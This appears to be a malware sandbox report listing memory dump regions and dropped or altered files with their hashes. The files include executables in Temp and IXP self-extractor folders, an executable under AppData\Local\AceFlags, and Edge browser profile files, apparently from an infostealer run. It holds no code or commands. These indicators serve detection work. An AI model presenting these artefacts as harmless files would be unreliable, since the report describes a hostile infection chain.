memory/4612-76-0x0000000075900000-0x00000000759F0000-memory.dmp

memory/800-81-0x00000199B50F0000-0x00000199B521A000-memory.dmp

memory/800-80-0x00007FF919A60000-0x00007FF91A521000-memory.dmp

memory/800-82-0x00000199B50F0000-0x00000199B521A000-memory.dmp

memory/800-79-0x00000199B50F0000-0x00000199B5220000-memory.dmp

memory/800-84-0x00000199B50F0000-0x00000199B521A000-memory.dmp

memory/4612-78-0x0000000075900000-0x00000000759F0000-memory.dmp

memory/800-88-0x00000199B50F0000-0x00000199B521A000-memory.dmp

memory/800-90-0x00000199B50F0000-0x00000199B521A000-memory.dmp

memory/800-96-0x00000199B50F0000-0x00000199B521A000-memory.dmp

memory/800-98-0x00000199B50F0000-0x00000199B521A000-memory.dmp

memory/800-101-0x00000199B50F0000-0x00000199B521A000-memory.dmp

memory/800-104-0x00000199B50F0000-0x00000199B521A000-memory.dmp

memory/800-106-0x00000199B50F0000-0x00000199B521A000-memory.dmp

memory/800-108-0x00000199B50F0000-0x00000199B521A000-memory.dmp

memory/800-112-0x00000199B50F0000-0x00000199B521A000-memory.dmp

memory/800-116-0x00000199B50F0000-0x00000199B521A000-memory.dmp

memory/800-120-0x00000199B50F0000-0x00000199B521A000-memory.dmp

memory/800-124-0x00000199B50F0000-0x00000199B521A000-memory.dmp

memory/800-128-0x00000199B50F0000-0x00000199B521A000-memory.dmp

memory/800-126-0x00000199B50F0000-0x00000199B521A000-memory.dmp

memory/800-122-0x00000199B50F0000-0x00000199B521A000-memory.dmp

memory/800-118-0x00000199B50F0000-0x00000199B521A000-memory.dmp

memory/800-114-0x00000199B50F0000-0x00000199B521A000-memory.dmp

memory/800-110-0x00000199B50F0000-0x00000199B521A000-memory.dmp

memory/800-94-0x00000199B50F0000-0x00000199B521A000-memory.dmp

memory/800-92-0x00000199B50F0000-0x00000199B521A000-memory.dmp

memory/800-86-0x00000199B50F0000-0x00000199B521A000-memory.dmp

memory/3856-77-0x0000000000400000-0x0000000000537000-memory.dmp

memory/800-75-0x000001999AA60000-0x000001999AB9A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C835.exe

MD5 441054a5a65b2dc08a71913eebc7877b
SHA1 0c2b94a38bb2541e64ba701cc282dd69dd9a59b2
SHA256 95dbc2387790e4d897e6208ec32696f2a05739ac8cae09e0ece8a00225456be8
SHA512 15de92af8ffa9bb0f43db191004eee997306470cfca1dcb7b997263a516b9f17d2fb9535764e0f3cc51732623a07d0f4aaa36e594ea286233ccc393ba3c9f0f3

memory/3856-70-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4612-68-0x00000000008C0000-0x000000000138A000-memory.dmp

memory/4612-572-0x0000000075900000-0x00000000759F0000-memory.dmp

memory/800-1009-0x000001999AF30000-0x000001999AF31000-memory.dmp

memory/800-1008-0x00000199B50E0000-0x00000199B50F0000-memory.dmp

memory/4612-1007-0x0000000075900000-0x00000000759F0000-memory.dmp

memory/800-1011-0x00000199B5220000-0x00000199B526C000-memory.dmp

memory/800-1010-0x00000199B4FD0000-0x00000199B509A000-memory.dmp

memory/4184-1019-0x0000027D14830000-0x0000027D14840000-memory.dmp

memory/4184-1020-0x0000027D14840000-0x0000027D14924000-memory.dmp

memory/4184-1018-0x00007FF919A60000-0x00007FF91A521000-memory.dmp

memory/800-1017-0x00007FF919A60000-0x00007FF91A521000-memory.dmp

memory/4184-1016-0x0000000000400000-0x00000000004AA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\C835.exe.log

MD5 bdd50fab193bb1a687efd2214c3ddd75
SHA1 2ed9874e543e755b7d7fb9f52fd687f2c287399f
SHA256 bfedba89a98eaff3bc2b9cabf01a9059f5a052e3849fb08f6fa00f845abc11e7
SHA512 318c4096b76cdb767ecc13ea9887098312140e2851c0a7b3e925d71bfc9ff03bc14bc8de9c3c38de39bc836368c0e29a09b9603d0769ebab4204895ae2f8c444

C:\Users\Admin\AppData\Local\Temp\C835.exe

MD5 462c88989837fa7aae929c5a871fc34f
SHA1 b39c0e6168eb31437cc5c8e7d48c08d133553fdd
SHA256 fb2a124a5ae2caf1ebf15a9b7850d3cb1386dc10fb6015c2c88320e1dec6c1b1
SHA512 be3e634eac5b7f965150fea6651cf8d8fc63e6c134bb5bba063636c92b69376f99f929bd7423401aec437aef33671a35b563920cdf5891305e28d677389bc301

memory/4184-3220-0x0000027D14790000-0x0000027D14798000-memory.dmp

memory/4184-3221-0x0000027D2D1B0000-0x0000027D2D206000-memory.dmp

memory/4184-3222-0x0000027D2DDC0000-0x0000027D2DE14000-memory.dmp

memory/4184-3224-0x00007FF919A60000-0x00007FF91A521000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6205.exe

MD5 9f30f74c554623d46dcc89ea1f020f3f
SHA1 9af9b405ddec1c9ae79d33eab2b94a6338f7e434
SHA256 6460d809714f944435a576da1f0d6f86930c59170a0d355d627245a5d9d97e0a
SHA512 ca583a43519636cd28cf949fdfe9cbf59803bc96bd0e667313d011ee6c045fcb4c8cf73908061db34cc358ebe611a794db8ab54562c3e53ce79928b4c5f137a9

C:\Users\Admin\AppData\Local\Temp\6205.exe

MD5 4178f0d6f2a4860ed35eaee12b24e7ed
SHA1 bd3b84190c7d57b6a7b9016d0a23a5e6d8aee342
SHA256 582326e879316b4a3a141510bc03a01a19425b873c4361c3a6f53ea2ef1f4665
SHA512 fdaf051bcea6a3effc9755178180f4366bc43e0ab53376f0a2ef5287b71ebd468d521823d2cb2618438f2140c5f9279896f6f8bb5bd6bcd6eee9bc86eb83c0d5

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc0LF94.exe

MD5 dbfdf328b4da33acc8caaaa7c4a4b4e3
SHA1 802dff96e65ef7c0c9eef0844d390803885d5648
SHA256 e0200ce991c93ca2c43c8c446f792f1e6f7c0d6ff2576855d241f76532b1edf0
SHA512 41ca93df09a3407969505ac21f07acfb37597ab0e844fec4e895af022d5219cb84390f371a393a3ff042537c2235e5066f2dd87d5d62ab4b225e1d8771048c20

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe

MD5 7481740676ddab38ce282b2e6e5223bd
SHA1 f47cf716e6cc0c2d2adaba7727c0abba9ded1cd0
SHA256 b9939cdf270a0845d337c02257c02270388d6323437aa2c91a386c813db64f63
SHA512 058d1926a1edfa755e8233766f1511235e6ad7931f4b4c0d044fb3b08656a0f2655a9a5343f2d8843ac7e03168008ed6a40a9d8d731e26c6d51de819e63c70d3

C:\Users\Admin\AppData\Local\Temp\704E.exe

MD5 7a721dbf14dd3eb263a9ae638f3b659f
SHA1 13452bd20b632687b51c9d0f9c1c4f80f0d14eea
SHA256 52c1c503ec181013e94aa9ec40f4dd18aa7f4f9b1205ac194d62e514fcb984de
SHA512 b1a9cb5ed60c364edb6f900cad5cd07377d08fce7782111bd94bd540598f22ad0768c56d50575eea2a896384c68f1f6d28a8d870809340e7df27fd88658a942a

memory/512-3312-0x0000000000B40000-0x0000000000C40000-memory.dmp

memory/512-3314-0x0000000004DB0000-0x0000000004DFC000-memory.dmp

memory/512-3313-0x00000000024E0000-0x000000000252F000-memory.dmp

memory/512-3315-0x0000000000400000-0x0000000000875000-memory.dmp

memory/512-3317-0x0000000004EB0000-0x0000000004EC0000-memory.dmp

memory/512-3316-0x0000000005470000-0x00000000054BA000-memory.dmp

memory/512-3319-0x0000000074470000-0x0000000074C20000-memory.dmp

memory/512-3322-0x0000000004EB0000-0x0000000004EC0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\grandUIAoPqEno2zQPpbG\information.txt

MD5 afbd20ea63d8c4ac3a30b44ef363404a
SHA1 432da6611ed1b042a397802403018fe338b3b0c4
SHA256 12c8bc4b1f8cb7613dd5367ce606d3a0ac0dfd3de3a063b4c39f75899c3c74b0
SHA512 b015130a73cdd7222dde942180d9377e16a1c14b2120ba46fd81c11bf3748eac1ba844ca8e99c75ba6b7861dd8576ee5eb2f9bbcefc789e470738411741a97e8

C:\Users\Admin\AppData\Local\AceFlags\yafqg\ContextProperties.exe

MD5 30ed4786a73d852611b9b01ef1662579
SHA1 75f325ecbb24e0028631d16b70ba0bd563b84108
SHA256 bab5f2153e132bc1ffe413ea7b5d64f43f416ad4c07d642e9ab6ffb632efe9f3
SHA512 a59f3062385eaef8261e2abd12148812f52d52d21124d55da3a3f477583946eaa72928ac14be6a699fac7bcbc9f87c7a81f78880794acc15508701ddbbff8af2

C:\Users\Admin\AppData\Local\AceFlags\yafqg\ContextProperties.exe

MD5 ab0443c4b5ae89cd913377183852ecb3
SHA1 23cf5fb65377cfe0af63adede50c50fb24dc32ab
SHA256 8252f99b0f6c26c5c6360c896b26d2acf273ec3c68cf2d883fce4727fe926237
SHA512 149ef11f5b394b29310bb43bac8dc7356fe08c8916359b85de8b05b6033c76cb3e230fcd7098bba9acaf7dfc4570aba479b6e9b05369043f1d24a7f5d78e7d7b

memory/752-4411-0x00007FF9199B0000-0x00007FF91A471000-memory.dmp

memory/512-4412-0x0000000004EB0000-0x0000000004EC0000-memory.dmp

memory/512-4728-0x00000000060B0000-0x0000000006116000-memory.dmp

memory/512-4749-0x00000000069A0000-0x0000000006A16000-memory.dmp

memory/512-4770-0x0000000006CB0000-0x0000000006CCE000-memory.dmp

memory/512-4841-0x0000000007970000-0x0000000007B32000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4CW110XU.exe

MD5 726e2b68c1ae48f97c2fe9c1bc4a4427
SHA1 2d2a372044d81b096b13a70c2c296bf066eb7264
SHA256 c3bc433c6edda74aed9077a9f467ac5d3273c9edea4ab8d4c0976e7537dc7f7b
SHA512 a3e66efdbf13851ee21abb97bbf93fe3d932054bd67b78c181e5d692930e6400018a8a2839fb4b6e10083eaaf86c08d31ca53770e87e002cabde385741cdfdfc

memory/4808-4851-0x0000000000400000-0x000000000040B000-memory.dmp

memory/512-4846-0x0000000007B40000-0x000000000806C000-memory.dmp

memory/512-5176-0x0000000006FA0000-0x0000000006FF0000-memory.dmp

memory/752-5346-0x0000018DC45C0000-0x0000018DC45C1000-memory.dmp

memory/752-5345-0x0000018DC46A0000-0x0000018DC46B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Pv3II0.exe

MD5 77b0daacdaca9b4e68ca2bbbf0334e1e
SHA1 5d13fe5d165d34ea5c7e7be1667e4f9e1b14d2d9
SHA256 293aeee2e32fe0aeb4eeedfe781b27fe98d4797ef6a55696cf5aa60af6021a7a
SHA512 de691aabbc65ef9df2cfc580c4b36bb1dd1dbea53dd53f086fce19ad6bb15e8d57ff19a19e04fc43319ea8723e6ad0ae836c3dbbe66c98eeb3608a471aa07b34

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 7e28bd87b49b80368d7aba631ad5cced
SHA1 2e1e3221819f19cdafe0af74dc0bac7ea4754f93
SHA256 0a5962af258cc996e30f1dbb7fe93e31127db64a3ede9badf16dd1f43de85341
SHA512 3b14b752c6706abba6ba0760ccafb7e2160f9bc28e5ff241c67819ce152f4f0e31fc691a2b06cde2aefcbecbf8be8c1cd1de61b8b4eb5d13f1ed9fe9a30935fe

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 7423fe47ea43336a0a4f1bb458b74cf8
SHA1 f8999434b74e25d2ac55835aef513101d7ed70de
SHA256 15cbd212cd7cf8be59a414c41dece3e5658f03cbb791d7f501ce9b6e3bb59ee3
SHA512 cd01e4c3acec81a861c9d53c02c51c31aa8e30e059bead8ee24ca0d7db7346dac2d5de26a91a3626864716c0aebe3af7bd0cfbfb03ed2d9ac1379a0d0c87cfab

\??\pipe\LOCAL\crashpad_4076_XKSDDQYHIGWEWPBY

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 47b385d182ee5e0024a8de621c247721
SHA1 ed383200ec8cc89b6f8e48350af79f6a212d8654
SHA256 d94eaebac83abb954eb6d9b85021fdc5aa394eb9d9ce1e75e0a8b670016a8d20
SHA512 7dded553839fe32e291cdbc00f91175059418466cdda07f1677d90b7d7622df2383a9ba61e2aa0288ecca5e88adea0ec7adb75b841090e721d7a8c04172df5cb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 04434cd05326afd503cb9340489fb188
SHA1 f440815931ccea384b93408005070d1a637303de
SHA256 cb946c875d2bc7476b923c7fa8ae08c9e6c42d5128bb25764294bb650c14b95c
SHA512 c95a5c6d16b9ee8e15ad210a35ec0c82dcee600223d934e45861545a8fd06d577a146418031d9b44682bde3bdd744ee9ab64db676751a84a23433a8da6218f62

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 66b42854c79b36ebd78d397bd72d8024
SHA1 daf30e957c6f707fe6cd7180bb2c17da27dcf920
SHA256 86991e09f260e86395ade674e1f7b29ea838ced4f2c72611fe5cd84478f18f8f
SHA512 738ad266b14ac8db2cf9e44fbf5dea9e7d9812ee992ef439db44855da56caf866325b86146fb08b5270f20fbd5098f0696d53113e2c6d4291f5fafba23a5e755

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 2f87e1c6eb1bc96b79ebfcfcc5eda65b
SHA1 1079583b89c8979389fd852efce477f69f2fec83
SHA256 6fa14c1f44ff4b30cd965bf7157264014f66246ba9d905859a79ab7d9e759ba3
SHA512 085e33a508e8cd79630aa9e4709e9e74722dc3d4f8d1d35d70c855c30a2935c75689579f20e10f2ce4d5ff90aa3242dcee923e3cba71b2c180f254e14a984a4c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 db1415c7c4f52e8f354d47b1a94ff56e
SHA1 45952e99bf71659b8bef6c774458914e0107d5a2
SHA256 eb22c1ef835d5e5d79fce95326a86b6d743da9549552bff6affaa4e6a046f91d
SHA512 d58ec255d75f44e47f8bce85c6fe7e661381001c750a3c8e2eb1a728253b039fe13ee9e0661e4dd23a880951af84198f2a4de1b84cf734ea55b479b4b8e3accd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\12eb5c68-806e-4e4b-b2fd-682b96694f13.tmp

MD5 aaa0a9519c91579d3a0587415deb0bec
SHA1 88b78410733c07e32a24b99d7e94e4d764085ede
SHA256 ddba7ae326b56f58182e352de898bfde1a1ba71d9f7c172b834db3ae0172dd76
SHA512 2b819e146d22613f5fc0e29afd026eb8d07e21330e57c59136b11b60b52e818aa97fb1f10c8d4b3b49a26cd434e5dbac441e4606dc7b2acdec0975f37468c88a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2f6d018e9897ab5717fb058559b28d22
SHA1 ebe97cd52133da1bf1dd94c4e415b98df4f12ebf
SHA256 522491e9f52fc26de4a63aa7373e91e092158a9967f10662d1dacb0d8452a8e6
SHA512 23a1dc79109872f9ee38d067bc13c4c03ec1046dd1e8ef358e63fd2ad38f679088d86f20c3a882f7a03d33f51c4f8d54f4f6cd1b09adefe6f04df662e17ce111

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 5e4a2730ab179640ce181babac5b3e17
SHA1 4ad7a34c15eda101640d3c9d76e9bc80bc5aedae
SHA256 6d5df00c9ed0d1acc5800973e425e98d94caf8bf0e4cabe7a77e1adbf89d5037
SHA512 b7118fa73db71fb65f16658a7b49174c06acdf6a3702822d70324d8c9468c5e91b0ec02ab6b2b2af3c4fc48c626a1d3fb7468231216010d86427ab2042ecd07e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001

MD5 923a543cc619ea568f91b723d9fb1ef0
SHA1 6f4ade25559645c741d7327c6e16521e43d7e1f9
SHA256 bf7344209edb1be5a2886c425cf6334a102d76cbea1471fd50171e2ee92877cd
SHA512 a4153751761cd67465374828b0514d7773b8c4ed37779d1ecfd4f19be4faa171585c8ee0b4db59b556399d5d2b9809ba87e04d4715e9d090e1f488d02219d555

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

MD5 7d75a9eb3b38b5dd04b8a7ce4f1b87cc
SHA1 68f598c84936c9720c5ffd6685294f5c94000dff
SHA256 6c24799e77b963b00401713a1dbd9cba3a00249b9363e2c194d01b13b8cdb3d7
SHA512 cf0488c34a1af36b1bb854dea2decfc8394f47831b1670cab3eed8291b61188484cc8ab0a726a524ecdd20b71d291bcccbc2ce999fd91662aca63d2d22ed0d9f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000024

MD5 909324d9c20060e3e73a7b5ff1f19dd8
SHA1 feea7790740db1e87419c8f5920859ea0234b76b
SHA256 dfc749d2afefe484d9aa9f8f06d461ad104a0ca9b75b46abfaaddda64a5e9278
SHA512 b64d2dce1f9a185fbb8a32adc1ff402d8045d379600bf3f9154bbde18303610f18af9fce258442db1e621ecf10b77aafe99cffedfcbe2a1490056c50cc42d0f9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000025

MD5 d55250dc737ef207ba326220fff903d1
SHA1 cbdc4af13a2ca8219d5c0b13d2c091a4234347c6
SHA256 d3e913618a52fe57ab4320e62a5ace58a699d6bce8187164e198abe3279726fd
SHA512 13adff61e2cfa25dc535eba9d63209b7e7e9bd29fc4d6c868b057df7f680aa66ef5783a0e82a8367185debf7f6fe5bae89adc0770daff5317d2e16db5ad3ab39

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 780fa99963a45b501659ccae01a30b3f
SHA1 f34cc4dfc0f03fd052401d5016aa9d7a30bdb5f1
SHA256 a98cef4ce6797358ad91f97cd22ec63e95ff2a176b7f69c46caf425ccf5afe3e
SHA512 5a66887c9803ac962c00b6f0809267d8e755e6c6aee7ce9fb76e7bfce65d9f81253b85c35fb69a4fc927cd473fd37c14bcd9ef6952db1607ff7ce1c2a0b0219c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58f160.TMP

MD5 368dd672b1ef39c7d3015a665f8b0bd4
SHA1 5956f2adcfba234801047735a755e605fc754864
SHA256 54d195eb512b829054f471919f81aa6ff639543bdb569dcdc324c9ba4519825d
SHA512 585032a8832e36a41eb5d922f8f36e5346f0919d6521afc7925db281e5522a175fd7ae8bc3251370cbe95036a253eac2f00466167056fd690d7de8c0680a6a64

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000041

MD5 b3ba9decc3bb52ed5cca8158e05928a9
SHA1 19d045a3fbccbf788a29a4dba443d9ccf5a12fb0
SHA256 8bd1b2afcbe2fa046b0937197f1b2f393ef821ff89331f99754b9006f0114df4
SHA512 86a86d370e96fa29c0c1d12991c2287936b400830869ff7b5abe4de6f32db2df782b626d724496cd6de27f8cbd32101ba34cbcd4c650ef11afa26bc048d68529

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 35cc0714cdee96b9f91e43c77f5f36fe
SHA1 eb3c4cef77f31cd720052499e39fd4ab9f973c58
SHA256 ec71973b32e7132b7eee36d1816ad7acad203fdada2b7269789b0ea5d1da7b09
SHA512 bf596338fd5c57df379bc25e90c967f65959e567af1514c4ae57fd4bf08ca392e8e26ca87e29e7655a2a758597b5950fc2194db0667c9d7d2505b7378b5fd1c3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 9c19e9a2fc4a1b7f77a95bdc9c02f54d
SHA1 7f700b672d12c3dfceea6c5a25ce27ce0c0faf0a
SHA256 b61155da8680671478741899f0ae21eeca004c534e2c3c5f0daf4ca45c75cf3c
SHA512 3e95d2ea79d5e57affeb8f278988c50f009c24c2ac3214c33786dd7f2c314272de1f521f05285ce81c1a163d52a8e9b465324443ee65dbbd90b5c233ed705c03

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 74df6976e633ffeb7cea9434c1ac4e74
SHA1 fe5582f0a586b7303e5441e593ef3d3a3e87d30b
SHA256 51a0df286c8c731e3b43f8a7373bccbb88c52cc21e4c9b293512abea0b34c3fa
SHA512 36ec1f2e17e014a851c1d2301126cb66930792636f04f628e218ac229d4500ceb7e4837ea0b39c1ef717bc511a32dc958e24389823a5fe06dc7c7f2933962e91

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 1204a35984084a873c68e945588db4ca
SHA1 99ce32bbc76a21af238c6290bb6bd19f65a51a55
SHA256 2dfe9e394c61e5a58662ff63c50af552fdfe099664780108f07452e1c92d7f92
SHA512 33a01cc62c91cc49a43c564ea104232420f380716ab8392bd05ac0d1f39afd17056168e8c0c9b6d2d8cc7d2934cb4fac94257e7f44a547ae543fd17afefb7c92

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 7f0cddd1a4e57bc9e7796eeaec5dc795
SHA1 3b6f60ccc81f725fced18fa766bb6d0d29358275
SHA256 e908fa328e02472f7f3ffcad1f5f3570182fd1371b9d1da298409390a1810c45
SHA512 6d28e4c668f36b67e2e1c6e2f720d89c8c073e12e5f0338b9e6f81ee0b7065be50fe074eeb497d6c133c1bbebf8869884a200b25532cfe670b1c842cc02ed9c3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\index.txt

MD5 86d642e70d9efd5a431ae22c5624cbdf
SHA1 245d3a0d301cc1f97303585d198fdd6ff74e9fb3
SHA256 78f0b41bc2b0deb8cfb94e7f62b7b3bd744c24df7bebb41b2695b21891a9be36
SHA512 841c70ae501888301db12817b763c9e1d03272a9fd1f8be56c60f055b2ad7995d7fe35a37a1a7c6e9d28f970d8aaaf7f1d29ad36531c8a2774861e3bd509eed3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 297581320bfd14ca7295ff9e839771f1
SHA1 622941bdaa5860a68795232e00399ce4d4ebe98b
SHA256 ceefd1574914f2fd7ea37e6d20296186cc795e0922fa94e7f91ca53b4b9615d1
SHA512 797076d01cd9b8d140d97814cb320f4337947d01d66527c627845ae234a7b2e432d56750c588fd25f5ad73c4349be13d333ae11365b2f028ab352b89cf42acda

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 933dc6d5d258580b62e4b6a6e43ac779
SHA1 de09ae9415d52b305e564902b7f087fb0c5a47dc
SHA256 1a07adcde6bb3d84417580022eeeaf444568ecb8e878e886d06c70339004c036
SHA512 48687536155c47668a453950620d63154dd39b0dae1a9a24d63f3c0188a39bafa60b750e9b1e11ab5cda95a29353e172fdb491afa428dae9ce7f7e266918f51e